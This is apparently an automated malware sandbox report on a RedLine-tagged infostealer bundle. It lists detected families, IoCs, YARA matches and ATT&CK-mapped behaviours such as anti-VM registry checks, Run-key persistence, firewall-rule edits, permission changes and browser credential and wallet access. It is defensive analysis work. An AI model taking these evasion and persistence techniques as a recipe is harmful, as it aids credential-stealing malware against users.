redline | b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072

Modify Existing Service

T1031

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_32-1 = "V2.0\|Action=Block\|Dir=In\|App=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\|Svc=clr_optimization_v4.0.30319_32\|Name=Block traffic for clr_optimization_v4.0.30319_32\|"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_32-2 = "V2.0\|Action=Block\|Dir=Out\|App=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\|Svc=clr_optimization_v4.0.30319_32\|Name=Block traffic for clr_optimization_v4.0.30319_32\|"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_64-1 = "V2.0\|Action=Block\|Dir=In\|App=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\|Svc=clr_optimization_v4.0.30319_64\|Name=Block traffic for clr_optimization_v4.0.30319_64\|"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_64-2 = "V2.0\|Action=Block\|Dir=Out\|App=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\|Svc=clr_optimization_v4.0.30319_64\|Name=Block traffic for clr_optimization_v4.0.30319_64\|"	msiexec.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System	msiexec.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral3/memory/572-317-0x000000000041B23A-mapping.dmp	family_redline

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 3 IoCs

resource	yara_rule
behavioral3/files/0x00050000000132a0-112.dat	family_socelars
behavioral3/files/0x00050000000132a0-156.dat	family_socelars
behavioral3/files/0x00050000000132a0-167.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral3/memory/1756-192-0x0000000000400000-0x0000000002E08000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral3/files/0x00050000000130d5-70.dat	aspack_v212_v242
behavioral3/files/0x00050000000130d5-71.dat	aspack_v212_v242
behavioral3/files/0x00060000000126a2-73.dat	aspack_v212_v242
behavioral3/files/0x00060000000126a2-72.dat	aspack_v212_v242
behavioral3/files/0x000500000001318e-76.dat	aspack_v212_v242
behavioral3/files/0x000500000001318e-77.dat	aspack_v212_v242

Blocklisted process makes network request 4 IoCs

flow	pid	Process
105	2240	powershell.exe
115	2240	powershell.exe
177	2240	powershell.exe
178	2240	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 64 IoCs

pid	Process
280	setup_installer.exe
588	setup_install.exe
316	Thu161580bf75.exe
1020	Thu166f9a8bbe80.exe
1756	Thu1628aafb3efd7c3d.exe
1028	conhost.exe
1876	Thu16205451b994.exe
1104	Thu16f584bd3686.exe
524	Thu167d514d2a7ac5a.exe
788	Thu165bd34b1e1d4d81.exe
1940	Thu164ba03be19.exe
1220	Thu16f3de88a335950bb.exe
1380	Thu1653d94a8da.exe
2060	09xU.exE
2568	Thu16f3de88a335950bb.tmp
2640	net1.exe
2692	Thu16f3de88a335950bb.tmp
2772	net.exe
2868	5380584.scr
2936	4358253.scr
3000	postback.exe
3024	FarLabUninstaller.exe
3048	NDP472-KB4054531-Web.exe
2068	2664696.scr
2204	5376642.scr
2064	8367519.scr
2472	WinHoster.exe
2352	Thu164ba03be19.exe
1568	Setup.exe
1420	Yx48_d5ayCh4UmZgDHivc0dS.exe
572	Thu164ba03be19.exe
2240	powershell.exe
456	rvgdwch
2348	6F28.exe
2528	mofcomp.exe
1872	mscorsvw.exe
2528	mscorsvw.exe
2672	mscorsvw.exe
2592	regtlibv12.exe
2964	lodctr.exe
976	mscorsvw.exe
980	regtlibv12.exe
952	conhost.exe
2976	regtlibv12.exe
2660	regtlibv12.exe
1552	lodctr.exe
2804	regtlibv12.exe
2200	regtlibv12.exe
1776	mscorsvw.exe
1372	regtlibv12.exe
1720	regtlibv12.exe
1560	aspnet_regiis.exe
1124	mscorsvw.exe
2884	ngen.exe
1136	mscorsvw.exe
316	ngen.exe
940	mscorsvw.exe
1936	mscorsvw.exe
2520	IEXPLORE.EXE
1596	mscorsvw.exe
268	mscorsvw.exe
2292	mscorsvw.exe
2304	mscorsvw.exe
2116	mscorsvw.exe

Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
2356	icacls.exe
944	icacls.exe
1760	icacls.exe
1036	icacls.exe
2680	takeown.exe
2588	icacls.exe
980	icacls.exe
996	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4358253.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4358253.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2664696.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2664696.scr

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	Thu166f9a8bbe80.exe

Deletes itself 1 IoCs

pid	Process
2532	powershell.exe

Loads dropped DLL 64 IoCs

pid	Process
820	setup_x86_x64_install.exe
280	setup_installer.exe
280	setup_installer.exe
280	setup_installer.exe
280	setup_installer.exe
280	setup_installer.exe
280	setup_installer.exe
588	setup_install.exe
588	setup_install.exe
588	setup_install.exe
588	setup_install.exe
588	setup_install.exe
588	setup_install.exe
588	setup_install.exe
588	setup_install.exe
1272	cmd.exe
1556	cmd.exe
320	cmd.exe
320	cmd.exe
1420	Yx48_d5ayCh4UmZgDHivc0dS.exe
1420	Yx48_d5ayCh4UmZgDHivc0dS.exe
1216	cmd.exe
1216	cmd.exe
1020	Thu166f9a8bbe80.exe
1020	Thu166f9a8bbe80.exe
792	cmd.exe
1340	cmd.exe
1748	cmd.exe
1224	cmd.exe
1224	cmd.exe
376	cmd.exe
524	Thu167d514d2a7ac5a.exe
524	Thu167d514d2a7ac5a.exe
1756	Thu1628aafb3efd7c3d.exe
1756	Thu1628aafb3efd7c3d.exe
1028	conhost.exe
1028	conhost.exe
1940	Thu164ba03be19.exe
1940	Thu164ba03be19.exe
1876	Thu16205451b994.exe
1876	Thu16205451b994.exe
1220	Thu16f3de88a335950bb.exe
1220	Thu16f3de88a335950bb.exe
896	cmd.exe
1380	Thu1653d94a8da.exe
1380	Thu1653d94a8da.exe
788	Thu165bd34b1e1d4d81.exe
788	Thu165bd34b1e1d4d81.exe
2040	cmd.exe
2060	09xU.exE
2060	09xU.exE
2464	rundll32.exe
2464	rundll32.exe
2464	rundll32.exe
1220	Thu16f3de88a335950bb.exe
2568	Thu16f3de88a335950bb.tmp
2568	Thu16f3de88a335950bb.tmp
2568	Thu16f3de88a335950bb.tmp
2568	Thu16f3de88a335950bb.tmp
2640	net1.exe
2640	net1.exe
2640	net1.exe
2692	Thu16f3de88a335950bb.tmp
2692	Thu16f3de88a335950bb.tmp

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2680	takeown.exe
2588	icacls.exe
980	icacls.exe
996	icacls.exe
2356	icacls.exe
944	icacls.exe
1760	icacls.exe
1036	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5380584.scr

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4358253.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2664696.scr

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
69	ipinfo.io
70	ipinfo.io

Drops file in System32 directory 58 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\msvcr120_clr0400.dll	Setup.exe
File created	C:\Windows\system32\perfh00C.dat	mscorsvw.exe
File opened for modification	C:\Windows\SysWOW64\en-US\dfshim.dll.mui	msiexec.exe
File created	C:\Windows\system32\msvcr100_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\SysWOW64\msvcr120_clr0400.dll	Setup.exe
File created	C:\Windows\system32\perfh009.dat	aspnet_regiis.exe
File opened for modification	C:\Windows\SysWOW64\PerfStringBackup.INI	mscorsvw.exe
File created	C:\Windows\system32\aspnet_counters.dll	msiexec.exe
File created	C:\Windows\system32\msvcp110_clr0400.dll	msiexec.exe
File created	C:\Windows\system32\perfc00C.dat	aspnet_regiis.exe
File created	C:\Windows\system32\perfc011.dat	aspnet_regiis.exe
File opened for modification	C:\Windows\system32\msvcr110_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\system32\wbem\AutoRecover\7073EBB8E2F3C70E0FA1F650B7DEA970.mof	mscorsvw.exe
File created	C:\Windows\system32\msvcr120_clr0400.dll	msiexec.exe
File created	C:\Windows\system32\perfc009.dat	aspnet_regiis.exe
File created	C:\Windows\system32\perfh011.dat	mscorsvw.exe
File opened for modification	C:\Windows\SysWOW64\msvcr110_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\SysWOW64\msvcr100_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\system32\aspnet_counters.dll	msiexec.exe
File created	C:\Windows\SysWOW64\msvcr110_clr0400.dll	msiexec.exe
File created	C:\Windows\system32\perfc007.dat	mscorsvw.exe
File created	C:\Windows\system32\perfh009.dat	mscorsvw.exe
File created	C:\Windows\system32\msvcr110_clr0400.dll	msiexec.exe
File created	C:\Windows\SysWOW64\msvcr100_clr0400.dll	msiexec.exe
File created	C:\Windows\system32\perfc007.dat	aspnet_regiis.exe
File created	C:\Windows\system32\en-US\dfshim.dll.mui	msiexec.exe
File created	C:\Windows\SysWOW64\msvcp110_clr0400.dll	msiexec.exe
File created	C:\Windows\SysWOW64\aspnet_counters.dll	msiexec.exe
File created	C:\Windows\system32\perfh011.dat	aspnet_regiis.exe
File opened for modification	C:\Windows\SysWOW64\msvcr120_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\system32\msvcp110_clr0400.dll	msiexec.exe
File created	C:\Windows\system32\perfc011.dat	mscorsvw.exe
File created	C:\Windows\SysWOW64\PerfStringBackup.TMP	mscorsvw.exe
File created	C:\Windows\system32\msvcp120_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\system32\wbem\AutoRecover\716FDC254E211F547A560E1A71D0E6CA.mof	lodctr.exe
File opened for modification	C:\Windows\system32\msvcr100_clr0400.dll	msiexec.exe
File created	C:\Windows\system32\PerfStringBackup.TMP	aspnet_regiis.exe
File created	C:\Windows\system32\perfh00C.dat	aspnet_regiis.exe
File opened for modification	C:\Windows\system32\PerfStringBackup.INI	aspnet_regiis.exe
File opened for modification	C:\Windows\system32\wbem\AutoRecover\7073EBB8E2F3C70E0FA1F650B7DEA970.mof	mscorsvw.exe
File opened for modification	C:\Windows\SysWOW64\msvcp120_clr0400.dll	Setup.exe
File created	C:\Windows\SysWOW64\msvcr120_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\system32\msvcp120_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\system32\msvcr120_clr0400.dll	msiexec.exe
File created	C:\Windows\system32\perfc009.dat	mscorsvw.exe
File opened for modification	C:\Windows\SysWOW64\msvcp110_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\SysWOW64\msvcp120_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\system32\wbem\AutoRecover\D361F8B496FD6DAF7BEEF497E09C0DC1.mof	mscorsvw.exe
File created	C:\Windows\system32\perfh007.dat	mscorsvw.exe
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe
File opened for modification	C:\Windows\system32\wbem\AutoRecover\E6195BA9E153534E5472835E2F29A5B0.mof	mscorsvw.exe
File created	C:\Windows\SysWOW64\msvcp120_clr0400.dll	msiexec.exe
File opened for modification	C:\Windows\system32\wbem\AutoRecover\6F8564A71977AE6B940705DCC4847A8D.mof	conhost.exe
File created	C:\Windows\system32\perfh007.dat	aspnet_regiis.exe
File opened for modification	C:\Windows\SysWOW64\aspnet_counters.dll	msiexec.exe
File created	C:\Windows\SysWOW64\en-US\dfshim.dll.mui	msiexec.exe
File opened for modification	C:\Windows\system32\en-US\dfshim.dll.mui	msiexec.exe
File created	C:\Windows\system32\perfc00C.dat	mscorsvw.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2936	4358253.scr
2068	2664696.scr

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1940 set thread context of 572	1940	Thu164ba03be19.exe	98

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FarLabUninstaller\is-NH4HC.tmp	Thu16f3de88a335950bb.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-CMO99.tmp	Thu16f3de88a335950bb.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu16f3de88a335950bb.tmp
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml	msiexec.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe	Thu16f3de88a335950bb.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu16f3de88a335950bb.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-E6DBE.tmp	Thu16f3de88a335950bb.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-7BBOA.tmp	Thu16f3de88a335950bb.tmp
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml	msiexec.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml	msiexec.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml	msiexec.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe	Thu16f3de88a335950bb.tmp

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\diasymreader.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\Browsers\iemobile.browser	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF38D.tmp	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4221.tmp	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.xsd	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Security\App_LocalResources\security0.aspx.resx	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Threading.ThreadPool.dll	msiexec.exe
File created	C:\Windows\inf\Windows Workflow Foundation 4.0.0.0\000D\PerfCounters.ini	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\System.Windows.Presentation.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallSqlStateTemplate.sql	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state_perf.h	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.dll	msiexec.exe
File created	C:\Windows\inf\MSDTC Bridge 4.0.0.0\0008\_TransactionBridgePerfCounters.ini	lodctr.exe
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Text.RegularExpressions\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Text.RegularExpressions.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\SQL\en\DropSqlWorkflowInstanceStoreLogic.sql	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\assembly\GAC_32\System.Printing\v4.0_4.0.0.0__31bf3856ad364e35\System.Printing.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_rightCorner.gif	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\Fonts\GlobalSansSerif.CompositeFont	msiexec.exe
File created	C:\Windows\Microsoft.NET\assembly\GAC_32\ISymWrapper\v4.0_4.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.Entity.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_isapi.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition.Registration\v4.0_4.0.0.0__b77a5c561934e089\System.ComponentModel.Composition.Registration.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Resources.ResourceManager.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\webAdminNoNavBar.master	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Deployment.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.WorkflowServices.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsecimpl.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Activities.Core.Presentation.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\System.Windows.Input.Manipulations.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Presentation\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Presentation.dll	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC9F1.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Serialization.Formatters.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\App_LocalResources\navigationBar.ascx.resx	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\compatjit.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\NETFXRepair.1033.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.Forms.DataVisualization.Design.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config.comments	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\webengine4.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WMINet_Utils.dll	Setup.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_dataperfcounters_shared12_neutral.h	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEB35.tmp	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Data.Entity.Build.Tasks.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\XamlBuildTask\v4.0_4.0.0.0__31bf3856ad364e35\XamlBuildTask.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\header.bmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\AppConfig\App_LocalResources\EditAppSetting.aspx.resx	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\UninstallRoles.sql	msiexec.exe
File created	C:\Windows\Microsoft.NET\NETFXRepair.1032.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Diagnostics.Debug.dll	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\en-US\WorkflowServiceHostPerformanceCounters.dll.mui	msiexec.exe
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Discovery\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Discovery.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Threading.Overlapped.dll	msiexec.exe
File created	C:\Windows\inf\ASP.NET\000E\aspnet_perf2.ini	aspnet_regiis.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Culture.dll	msiexec.exe
File created	C:\Windows\inf\.NET CLR Networking 4.0.0.0\0013\_Networkingperfcounters.ini	lodctr.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualBasic.targets	msiexec.exe
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml.XPath.XDocument\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Xml.XPath.XDocument.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB071.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDF66.tmp	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\Fonts\GlobalSansSerif.CompositeFont	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2836	1756	WerFault.exe	47
3012	1020	WerFault.exe	41

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rvgdwch
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rvgdwch
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rvgdwch
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	conhost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	conhost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	conhost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Setup.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
2072	taskkill.exe
2656	taskkill.exe
2880	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 18 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppName = "dfsvc.exe"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\Policy = "3"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\Policy = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}\AppPath = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\Policy = "3"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}\Policy = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\CLSID = "{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}"	msiexec.exe
